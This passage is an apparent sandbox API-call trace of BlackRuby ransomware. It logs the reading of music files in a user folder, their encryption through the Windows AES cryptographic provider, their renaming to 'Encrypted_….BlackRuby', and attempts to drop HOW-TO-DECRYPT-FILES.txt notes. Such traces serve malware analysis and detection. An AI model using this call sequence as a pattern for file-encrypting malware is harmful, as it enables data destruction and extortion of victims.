[0059.880] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.880] GetLastError () returned 0x0 [0059.880] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1cd45cc*=0x1, dwFlags=0x0) returned 1 [0059.880] GetLastError () returned 0x0 [0059.880] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1cd4598, dwFlags=0x0) returned 1 [0059.880] GetLastError () returned 0x0 [0059.881] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb7b10*, pdwDataLen=0x18ed74*=0x17980, dwBufLen=0x17980 | out: pbData=0x2cb7b10*, pdwDataLen=0x18ed74*=0x17980) returned 1 [0059.881] GetLastError () returned 0x0 [0059.882] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd4628*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cd4628*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.882] GetLastError () returned 0x0 [0059.882] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd4658*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cd4658*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.882] GetLastError () returned 0x0 [0059.883] CryptDestroyKey (hKey=0x3609e0) returned 1 [0059.883] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.883] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.884] GetFileType (hFile=0x184) returned 0x1 [0059.884] GetFileType (hFile=0x184) returned 0x1 [0059.886] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\7qR61dYnkwu1bn5EV.mp3" (normalized: "c:\\users\\eebsym5\\music\\7qr61dynkwu1bn5ev.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_TuLRaILsdcKZlJA3pQmqOm64CfiZIfE6THZOGa9BVrBtMqA.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_tulrailsdckzlja3pqmqom64cfizife6thzoga9bvrbtmqa.blackruby")) returned 1 [0059.886] GetLastError () returned 0xb7 [0059.887] SetErrorMode (uMode=0x0) returned 0x1 [0059.887] GetFileType (hFile=0x184) returned 0x1 [0059.887] GetFileType (hFile=0x184) returned 0x1 [0059.887] ReadFile (in: hFile=0x184, lpBuffer=0x1cf3328, nNumberOfBytesToRead=0xca8f, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cf3328*, lpNumberOfBytesRead=0x18ed84*=0xca8f, lpOverlapped=0x0) returned 1 [0059.888] GetLastError () returned 0x0 [0059.926] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b5e914, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0059.926] GetLastError () returned 0x0 [0059.926] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.926] GetLastError () returned 0x0 [0059.931] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.931] GetLastError () returned 0x0 [0059.931] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0059.931] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.931] GetLastError () returned 0x0 [0059.932] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b8b960*=0x1, dwFlags=0x0) returned 1 [0059.932] GetLastError () returned 0x0 [0059.932] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b8b92c, dwFlags=0x0) returned 1 [0059.932] GetLastError () returned 0x0 [0059.932] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8b9a8*, pdwDataLen=0x18ed74*=0xcb80, dwBufLen=0xcb80 | out: pbData=0x1b8b9a8*, pdwDataLen=0x18ed74*=0xcb80) returned 1 [0059.932] GetLastError () returned 0x0 [0059.932] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba50d4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ba50d4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.932] GetLastError () returned 0x0 [0059.932] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ba5104*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ba5104*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.932] GetLastError () returned 0x0 [0059.932] CryptDestroyKey (hKey=0x360aa0) returned 1 [0059.932] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.933] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav", lpFilePart=0x0) returned 0x25 [0059.933] GetLastError () returned 0x0 [0059.933] SetErrorMode (uMode=0x1) returned 0x0 [0059.933] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav" (normalized: "c:\\users\\eebsym5\\music\\aaovxhvjug.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.934] GetLastError () returned 0xb7 [0059.934] GetFileType (hFile=0x184) returned 0x1 [0059.934] SetErrorMode (uMode=0x0) returned 0x1 [0059.934] GetFileType (hFile=0x184) returned 0x1 [0059.935] CloseHandle (hObject=0x184) returned 1 [0059.935] GetLastError () returned 0xb7 [0059.935] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav", lpFilePart=0x0) returned 0x25 [0059.935] GetLastError () returned 0xb7 [0059.935] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_A7lfZSNrXOpZ6VAlkryyJTgdUQdzBZRWsrGeAKD.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_A7lfZSNrXOpZ6VAlkryyJTgdUQdzBZRWsrGeAKD.BlackRuby", lpFilePart=0x0) returned 0x52 [0059.935] GetLastError () returned 0xb7 [0059.935] SetErrorMode (uMode=0x1) returned 0x0 [0059.935] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav" (normalized: "c:\\users\\eebsym5\\music\\aaovxhvjug.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55098c80, ftCreationTime.dwHighDateTime=0x1d35830, ftLastAccessTime.dwLowDateTime=0xd11dec90, ftLastAccessTime.dwHighDateTime=0x1d34c45, ftLastWriteTime.dwLowDateTime=0x2bea32c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xcb90)) returned 1 [0059.935] GetLastError () returned 0xb7 [0059.935] SetErrorMode (uMode=0x0) returned 0x1 [0059.935] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\AAOVxHVjuG.wav" (normalized: "c:\\users\\eebsym5\\music\\aaovxhvjug.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_A7lfZSNrXOpZ6VAlkryyJTgdUQdzBZRWsrGeAKD.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_a7lfzsnrxopz6valkryyjtgduqdzbzrwsrgeakd.blackruby")) returned 1 [0059.936] GetLastError () returned 0xb7 [0059.936] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.936] GetLastError () returned 0xb7 [0059.936] SetErrorMode (uMode=0x1) returned 0x0 [0059.936] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.936] GetLastError () returned 0x5 [0059.937] SetErrorMode (uMode=0x0) returned 0x1 [0059.937] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.937] GetLastError () returned 0x5 [0059.937] SetErrorMode (uMode=0x1) returned 0x0 [0059.937] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1bced54 | out: lpFileInformation=0x1bced54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329f74a0, ftCreationTime.dwHighDateTime=0x1d34ebe, ftLastAccessTime.dwLowDateTime=0x94151b90, ftLastAccessTime.dwHighDateTime=0x1d35404, ftLastWriteTime.dwLowDateTime=0x94151b90, ftLastWriteTime.dwHighDateTime=0x1d35404, nFileSizeHigh=0x0, nFileSizeLow=0x11675)) returned 1 [0059.937] GetLastError () returned 0x5 [0059.937] SetErrorMode (uMode=0x0) returned 0x1 [0059.938] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.938] GetLastError () returned 0x5 [0059.938] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.938] GetLastError () returned 0x5 [0059.938] SetErrorMode (uMode=0x1) returned 0x0 [0059.938] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.938] GetLastError () returned 0x0 [0059.938] GetFileType (hFile=0x184) returned 0x1 [0059.938] SetErrorMode (uMode=0x0) returned 0x1 [0059.938] GetFileType (hFile=0x184) returned 0x1 [0059.938] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x11675 [0059.938] GetLastError () returned 0x0 [0059.938] ReadFile (in: hFile=0x184, lpBuffer=0x1bd0e50, nNumberOfBytesToRead=0x11675, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bd0e50*, lpNumberOfBytesRead=0x18ed84*=0x11675, lpOverlapped=0x0) returned 1 [0059.939] GetLastError () returned 0x0 [0059.939] CloseHandle (hObject=0x184) returned 1 [0059.939] GetLastError () returned 0x0 [0059.939] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.939] GetLastError () returned 0x0 [0059.939] SetErrorMode (uMode=0x1) returned 0x0 [0059.939] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329f74a0, ftCreationTime.dwHighDateTime=0x1d34ebe, ftLastAccessTime.dwLowDateTime=0x94151b90, ftLastAccessTime.dwHighDateTime=0x1d35404, ftLastWriteTime.dwLowDateTime=0x94151b90, ftLastWriteTime.dwHighDateTime=0x1d35404, nFileSizeHigh=0x0, nFileSizeLow=0x11675)) returned 1 [0059.939] GetLastError () returned 0x0 [0059.939] SetErrorMode (uMode=0x0) returned 0x1 [0059.950] CryptImportKey (in: hProv=0x37c680, pbData=0x1c4dee4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0059.950] GetLastError () returned 0x0 [0059.950] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.950] GetLastError () returned 0x0 [0059.955] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.955] GetLastError () returned 0x0 [0059.955] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0059.955] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.955] GetLastError () returned 0x0 [0059.955] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c7af30*=0x1, dwFlags=0x0) returned 1 [0059.955] GetLastError () returned 0x0 [0059.955] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c7aefc, dwFlags=0x0) returned 1 [0059.955] GetLastError () returned 0x0 [0059.955] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c7af78*, pdwDataLen=0x18ed74*=0x11770, dwBufLen=0x11770 | out: pbData=0x1c7af78*, pdwDataLen=0x18ed74*=0x11770) returned 1 [0059.955] GetLastError () returned 0x0 [0059.956] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c9de84*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c9de84*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.956] GetLastError () returned 0x0 [0059.956] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c9deb4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c9deb4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.956] GetLastError () returned 0x0 [0059.957] CryptDestroyKey (hKey=0x360da0) returned 1 [0059.957] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.957] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.957] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.957] GetLastError () returned 0x0 [0059.957] SetErrorMode (uMode=0x1) returned 0x0 [0059.957] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.958] GetLastError () returned 0xb7 [0059.958] GetFileType (hFile=0x184) returned 0x1 [0059.958] SetErrorMode (uMode=0x0) returned 0x1 [0059.958] GetFileType (hFile=0x184) returned 0x1 [0059.958] WriteFile (in: hFile=0x184, lpBuffer=0x1c9dee4*, nNumberOfBytesToWrite=0x11780, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1c9dee4*, lpNumberOfBytesWritten=0x18ed90*=0x11780, lpOverlapped=0x0) returned 1 [0059.960] GetLastError () returned 0xb7 [0059.960] CloseHandle (hObject=0x184) returned 1 [0059.961] GetLastError () returned 0xb7 [0059.961] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3", lpFilePart=0x0) returned 0x27 [0059.961] GetLastError () returned 0xb7 [0059.961] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_xwntdWxgs2WsXPVWt9ADqQ7Ejpky3vpQ4GJaCNtY1tJ7qH.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_xwntdWxgs2WsXPVWt9ADqQ7Ejpky3vpQ4GJaCNtY1tJ7qH.BlackRuby", lpFilePart=0x0) returned 0x59 [0059.961] GetLastError () returned 0xb7 [0059.961] SetErrorMode (uMode=0x1) returned 0x0 [0059.961] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329f74a0, ftCreationTime.dwHighDateTime=0x1d34ebe, ftLastAccessTime.dwLowDateTime=0x94151b90, ftLastAccessTime.dwHighDateTime=0x1d35404, ftLastWriteTime.dwLowDateTime=0x2beef580, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11780)) returned 1 [0059.961] GetLastError () returned 0xb7 [0059.961] SetErrorMode (uMode=0x0) returned 0x1 [0059.961] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\Ata8lR5cWAS7.mp3" (normalized: "c:\\users\\eebsym5\\music\\ata8lr5cwas7.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_xwntdWxgs2WsXPVWt9ADqQ7Ejpky3vpQ4GJaCNtY1tJ7qH.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_xwntdwxgs2wsxpvwt9adqq7ejpky3vpq4gjacnty1tj7qh.blackruby")) returned 1 [0059.961] GetLastError () returned 0xb7 [0059.962] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.962] GetLastError () returned 0xb7 [0059.962] SetErrorMode (uMode=0x1) returned 0x0 [0059.962] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.962] GetLastError () returned 0x5 [0059.964] SetErrorMode (uMode=0x0) returned 0x1 [0059.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0059.964] GetLastError () returned 0x5 [0059.964] SetErrorMode (uMode=0x1) returned 0x0 [0059.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), fInfoLevelId=0x0, lpFileInformation=0x1ccc71c | out: lpFileInformation=0x1ccc71c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e89e3b0, ftCreationTime.dwHighDateTime=0x1d34ecf, ftLastAccessTime.dwLowDateTime=0x30da70e0, ftLastAccessTime.dwHighDateTime=0x1d35344, ftLastWriteTime.dwLowDateTime=0x30da70e0, ftLastWriteTime.dwHighDateTime=0x1d35344, nFileSizeHigh=0x0, nFileSizeLow=0x9d61)) returned 1 [0059.964] GetLastError () returned 0x5 [0059.964] SetErrorMode (uMode=0x0) returned 0x1 [0059.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0059.964] GetLastError () returned 0x5 [0059.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0059.964] GetLastError () returned 0x5 [0059.964] SetErrorMode (uMode=0x1) returned 0x0 [0059.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.964] GetLastError () returned 0x0 [0059.964] GetFileType (hFile=0x184) returned 0x1 [0059.965] SetErrorMode (uMode=0x0) returned 0x1 [0059.965] GetFileType (hFile=0x184) returned 0x1 [0059.965] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x9d61 [0059.965] GetLastError () returned 0x0 [0059.965] ReadFile (in: hFile=0x184, lpBuffer=0x1cce1f0, nNumberOfBytesToRead=0x9d61, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cce1f0*, lpNumberOfBytesRead=0x18ed84*=0x9d61, lpOverlapped=0x0) returned 1 [0059.965] GetLastError () returned 0x0 [0059.966] CloseHandle (hObject=0x184) returned 1 [0059.966] GetLastError () returned 0x0 [0059.966] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0059.966] GetLastError () returned 0x0 [0059.966] SetErrorMode (uMode=0x1) returned 0x0 [0059.966] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e89e3b0, ftCreationTime.dwHighDateTime=0x1d34ecf, ftLastAccessTime.dwLowDateTime=0x30da70e0, ftLastAccessTime.dwHighDateTime=0x1d35344, ftLastWriteTime.dwLowDateTime=0x30da70e0, ftLastWriteTime.dwHighDateTime=0x1d35344, nFileSizeHigh=0x0, nFileSizeLow=0x9d61)) returned 1 [0059.966] GetLastError () returned 0x0 [0059.966] SetErrorMode (uMode=0x0) returned 0x1 [0059.966] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0059.966] GetLastError () returned 0x0 [0060.003] CryptImportKey (in: hProv=0x37c790, pbData=0x1b467c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ea0) returned 1 [0060.003] GetLastError () returned 0x0 [0060.003] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.003] GetLastError () returned 0x0 [0060.008] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.008] GetLastError () returned 0x0 [0060.008] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0060.008] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.008] GetLastError () returned 0x0 [0060.008] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b73814*=0x1, dwFlags=0x0) returned 1 [0060.008] GetLastError () returned 0x0 [0060.008] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b737e0, dwFlags=0x0) returned 1 [0060.008] GetLastError () returned 0x0 [0060.008] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7385c*, pdwDataLen=0x18ed74*=0x9e60, dwBufLen=0x9e60 | out: pbData=0x1b7385c*, pdwDataLen=0x18ed74*=0x9e60) returned 1 [0060.009] GetLastError () returned 0x0 [0060.009] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b87548*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b87548*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.009] GetLastError () returned 0x0 [0060.009] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b87578*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b87578*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.009] GetLastError () returned 0x0 [0060.009] CryptDestroyKey (hKey=0x360ea0) returned 1 [0060.009] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.009] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.009] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0060.009] GetLastError () returned 0x0 [0060.009] SetErrorMode (uMode=0x1) returned 0x0 [0060.009] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav" (normalized: "c:\\users\\eebsym5\\music\\bubolvfqpb_vv62jmw.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.010] GetLastError () returned 0xb7 [0060.010] GetFileType (hFile=0x184) returned 0x1 [0060.010] SetErrorMode (uMode=0x0) returned 0x1 [0060.010] GetFileType (hFile=0x184) returned 0x1 [0060.011] CloseHandle (hObject=0x184) returned 1 [0060.011] GetLastError () returned 0xb7 [0060.012] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\BUbOlVfqpB_vv62jmw.wav", lpFilePart=0x0) returned 0x2d [0060.012] GetLastError () returned 0xb7 [0060.012] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_4cPtjPVVJriBf7sY8yAKSfvHfUxX1Nztp7eG.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: 